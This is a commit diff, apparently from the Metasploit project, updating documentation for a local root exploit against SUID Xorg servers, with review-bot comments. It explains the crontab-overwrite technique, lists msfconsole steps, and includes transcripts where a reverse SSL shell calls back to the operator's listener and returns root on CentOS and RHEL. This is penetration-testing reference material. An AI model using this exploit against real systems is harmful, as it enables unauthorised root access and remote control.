
Update tested versions

Brendan Coles 4 months ago
parent
commit
163c66b5ba

+ 113
- 15
documentation/modules/exploit/multi/local/xorg_x11_suid_server.md

@@ -1,40 +1,37 @@
1 1
 ## Description
2 2
 
3
-  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.        
3
+  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.
4 4
 
5 5
 
6 6
 ## Vulnerable Application
7 7
 
8
-  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.  
8
+  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.
9 9
 
10
-  Xorg is more restrictive to exploit under CentOS.  The user must have console lock and SeLinux may interfere.  If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.  
10
+  Xorg is more restrictive to exploit under CentOS / RHEL.  The user must have console lock and SeLinux may interfere.  If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.
11 11
 
12 12
   This module has been tested successfully on:
13 13
 
14 14
   * OpenBSD 6.3
15 15
   * OpenBSD 6.4
16
+  * CentOS 7.4.1708 x86_64
16 17
   * CentOS 7.5.1084 x86_64
18
+  * Red Hat Enterprise Linux 7.5 x86_64
17 19
 
18 20
 
19 21
 ## Verification Steps
20
-  On CentOS your session must have console lock.  To get a console lock you can login locally with a user.  
22
+
23
+  On CentOS/RHEL your session must have console lock.  To get a console lock you can login locally with a user.
21 24
 
22 25
   1. Start `msfconsole`
23 26
   2. Get a session
24 27
   3. Do: `use exploit/multi/local/xorg_x11_suid_server`
25
-  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)   
28
+  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
26 29
   5. Do: `set SESSION [SESSION]`
27 30
   6. Do: `set LHOST [LHOST]`
28 31
   7. Do: `run`
29 32
   8. You should get a new *root* session
30 33
 
31 34
 
32
-## Options
33
-
34
-  **SESSION**
35
-
36
-  Which session to use, which can be viewed with `sessions`
37
-
38 35
 ## Advanced Options
39 36
 
40 37
   **Xdisplay**
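Review bot: the tested-versions list still carries the unchanged line `* CentOS 7.5.1084 x86_64`, which disagrees with the module description added in this same commit (`CentOS 7.5.1804`); 1804 is the CentOS 7.5 release tag, so correct the doc line while the list is being edited. Since the description and prerequisite lines are touched anyway (whitespace only), also fix "ran by cron" to "run by cron", "crontabs context" to "the crontab's context", settle on one spelling of SELinux (the docs alternate between "SeLinux" and "Selinux" while the module text now uses "SELinux"), and add the missing space in "default(cmd/unix/reverse_openssl)". Dropping the `## Options` / SESSION block is reasonable for a standard local-exploit option, but step 5 of the Verification Steps still refers to it, so a one-line mention would not hurt.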
@@ -43,19 +40,25 @@
43 40
 
44 41
   **WritableDir**
45 42
 
46
-  A writable directory file system path. (default: `/tmp`)
43
+  A writable directory file system path (default: `/tmp`)
47 44
 
48
-
49
-   **ConsoleLock**
45
+  **ConsoleLock**
50 46
    
51
-  Will check for console lock under linux  (default: `true`)
47
+  Will check for console lock under linux (default: `true`)
52 48
 
53 49
 
54 50
 ## Scenarios
55 51
 
52
+### OpenBSD
53
+
56 54
 ```
55
+msf5 > use exploit/multi/local/xorg_x11_suid_server
57 56
 msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
58 57
 session => 1
58
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2
59
+lhost => 172.30.0.2
60
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
61
+verbose => true
59 62
 msf5 exploit(multi/local/xorg_x11_suid_server) > run
60 63
 
61 64
 [!] SESSION may not be compatible with this module.
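Review bot: the new `### OpenBSD` heading gives no release, while the CentOS and RHEL scenario headings added later in this diff name the exact version; state which OpenBSD release (6.3 or 6.4 per the tested list) produced this transcript so readers can match output to a platform. The `set lhost 172.30.0.2` and `set verbose true` lines inserted into the existing transcript should come from the same run as the output that follows them, otherwise the scenario becomes a composite of two sessions.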
@@ -89,3 +92,98 @@ msf5 exploit(multi/local/xorg_x11_suid_server) > run
89 92
 id
90 93
 uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
91 94
 ```
95
+
96
+### CentOS 7.4.1708 x86_64
97
+
98
+```
99
+msf5 > use exploit/multi/local/xorg_x11_suid_server
100
+msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
101
+session => 1
102
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
103
+lhost => 172.16.191.165
104
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
105
+verbose => true
106
+msf5 exploit(multi/local/xorg_x11_suid_server) > run
107
+
108
+[*] Started reverse double SSL handler on 172.16.191.188:4444 
109
+[*] Running additional check for Linux
110
+[+] Console lock for user
111
+[+] Selinux is not an issue
112
+[+] Xorg path found at /usr/bin/Xorg
113
+[+] Xorg binary /usr/bin/Xorg is SUID
114
+[+] Xorg version 1.19.3 is vulnerable
115
+[!] Xorg in process list
116
+[!] Could not get version or Xorg process possibly running, may fail
117
+[+] Passed all initial checks for exploit
118
+[*] Uploading your payload, this could take a while
119
+[*] Trying /etc/crontab overwrite
120
+[+] /etc/crontab overwrite successful
121
+[*] Waiting on cron to run
122
+[*] Accepted the first client connection...
123
+[*] Accepted the second client connection...
124
+[*] Command: echo zk0jobDMxFdBxLBU;
125
+[*] Writing to socket A
126
+[*] Writing to socket B
127
+[*] Reading from sockets...
128
+[*] Reading from socket A
129
+[*] A: "zk0jobDMxFdBxLBU\n"
130
+[*] Matching...
131
+[*] B is input...
132
+[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
133
+[*] Waiting on cron to run
134
+[+] Returning session after cleaning
135
+[+] Deleted /tmp/.session-Tafw0iW0r8
136
+
137
+id
138
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
139
+uname -a
140
+Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
141
+```
142
+
143
+### Red Hat Enterprise Linux 7.5 x86_64
144
+
145
+```
146
+msf5 > use exploit/multi/local/xorg_x11_suid_server
147
+msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
148
+session => 1
149
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
150
+lhost => 172.16.191.165
151
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
152
+verbose => true
153
+msf5 exploit(multi/local/xorg_x11_suid_server) > run
154
+
155
+[*] Started reverse double SSL handler on 172.16.191.165:4444 
156
+[*] Running additional check for Linux
157
+[+] Console lock for user
158
+[+] Selinux is not an issue
159
+[+] Xorg path found at /usr/bin/Xorg
160
+[+] Xorg binary /usr/bin/Xorg is SUID
161
+[+] Xorg version 1.19.5 is vulnerable
162
+[!] Xorg in process list
163
+[!] Could not get version or Xorg process possibly running, may fail
164
+[+] Passed all initial checks for exploit
165
+[*] Uploading your payload, this could take a while
166
+[*] Trying /etc/crontab overwrite
167
+[*] Accepted the first client connection...
168
+[*] Accepted the second client connection...
169
+[*] Command: echo EEdPp66R4es6U3WF;
170
+[*] Writing to socket A
171
+[*] Writing to socket B
172
+[*] Reading from sockets...
173
+[+] /etc/crontab overwrite successful. Waiting for job to run (may take a minute)...
174
+[*] Reading from socket B
175
+[*] B: "EEdPp66R4es6U3WF\n"
176
+[*] Matching...
177
+[*] A is input...
178
+[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.228:44978) at 2019-04-21 06:29:04 -0400
179
+[+] Returning session after cleaning
180
+[+] Deleted /tmp/.session-aqxyug0fH
181
+
182
+id
183
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
184
+uname -a
185
+Linux red-hat-7-5-x64.local 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
186
+cat /etc/redhat-release
187
+Red Hat Enterprise Linux Server release 7.5 (Maipo)
188
+```
189
+
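Review bot: in the CentOS 7.4.1708 transcript, `set lhost 172.16.191.165` is followed by `Started reverse double SSL handler on 172.16.191.188:4444` and a session opened from .188, so the handler address does not match the LHOST shown; this looks like output pasted from a different run. The two transcripts also print different module output for the same step (`[*] Waiting on cron to run` twice on CentOS versus `[+] /etc/crontab overwrite successful. Waiting for job to run (may take a minute)...` on RHEL), which suggests they were captured with different module revisions; re-capture the CentOS run with the current module so the documented output matches what users will see. Both runs also emit `[!] Xorg in process list` and `[!] Could not get version or Xorg process possibly running, may fail` and still succeed; a sentence in the doc saying this warning is expected when the target user already has a running desktop session would save support questions. Minor: trailing whitespace after `4444` on both handler lines.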

+ 14
- 9
modules/exploits/multi/local/xorg_x11_suid_server.rb

@@ -5,6 +5,7 @@
5 5
 
6 6
 class MetasploitModule < Msf::Exploit::Local
7 7
   Rank = GoodRanking
8
+
8 9
   include Msf::Exploit::EXE
9 10
   include Msf::Exploit::FileDropper
10 11
   include Msf::Post::File
@@ -13,21 +14,25 @@ class MetasploitModule < Msf::Exploit::Local
13 14
 
14 15
   def initialize(info = {})
15 16
     super(update_info(info,
16
-      'Name'           => 'Xorg X11 Server SUID privilege escalation',
17
+      'Name'           => 'Xorg X11 Server SUID logfile Privilege Escalation',
17 18
       'Description'    => %q{
18 19
         This module attempts to gain root privileges with SUID Xorg X11 server
19 20
         versions 1.19.0 < 1.20.3.
20 21
 
21 22
         A permission check flaw exists for -modulepath and -logfile options when
22
-        starting Xorg.  This allows unprivileged users that can start the server
23
+        starting Xorg. This allows unprivileged users that can start the server
23 24
         the ability to elevate privileges and run arbitrary code under root
24 25
         privileges.
25 26
 
26
-        This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).
27
-        CentOS default install will require console auth for the users session.
28
-        Cron launches the payload so if Selinux is enforcing exploitation
27
+        This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and
28
+        CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS
29
+        and RHEL systems requires console auth for the user's session to start
30
+        the Xorg server.
31
+
32
+        Cron launches the payload, so if SELinux is enforcing, exploitation
29 33
         may still be possible, but the module will bail.
30
-        Xorg must have SUID permissions and may not start if running.
34
+
35
+        Xorg must have SUID permissions and may not start if already running.
31 36
 
32 37
         On exploitation a crontab.old backup file will be created by Xorg.
33 38
         This module will remove the .old file and restore crontab after
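Review bot: the tested-platforms sentence reads "OpenBSD 6.3, 6.4, CentOS 7.4.1708, and CentOS 7.5.1804, and RHEL 7.5", with a stray "and" before CentOS 7.5.1804; drop the first "and" or rewrite as "OpenBSD 6.3 and 6.4, CentOS 7.4.1708 and 7.5.1804, and RHEL 7.5". The description is shown verbatim by `info`, so the wording is user-facing. Otherwise the split into three paragraphs (PAM/console requirement, SELinux behaviour, SUID/already-running) reads much better than the original block.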
@@ -41,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
41 46
           'Narendra Shinde', # Discovery and exploit
42 47
           'Raptor - 0xdea',  # Modified exploit for cron
43 48
           'Aaron Ringo',     # Metasploit module
44
-          'bcoles' # Metasploit module
49
+          'bcoles'           # Metasploit module
45 50
         ],
46 51
       'DisclosureDate' => 'Oct 25 2018',
47 52
       'References'     =>
@@ -80,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Local
80 85
        [
81 86
          OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
82 87
          OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
83
-         OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])
88
+         OptBool.new('ConsoleLock', [ true, 'Will check for console lock on linux systems', true ])
84 89
        ]
85 90
      )
86 91
   end
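Review bot: the ConsoleLock description is changed to "Will check for console lock on linux systems", but the documentation hunk in this same commit keeps "Will check for console lock under linux (default: `true`)"; keep the two strings in sync and capitalise Linux in both. Since the description now states that the default PAM configuration requires console auth for the user's session to start Xorg, consider wording the option so it is clear that setting it to false only skips the pre-flight check and does not remove that requirement.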
@@ -168,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Local
168 173
     check_status = check
169 174
     if check_status == CheckCode::Appears
170 175
       print_warning 'Could not get version or Xorg process possibly running, may fail'
171
-    elsif check_status ==  CheckCode::Safe
176
+    elsif check_status == CheckCode::Safe
172 177
       fail_with Failure::NotVulnerable, 'Target not vulnerable'
173 178
     end
174 179
 
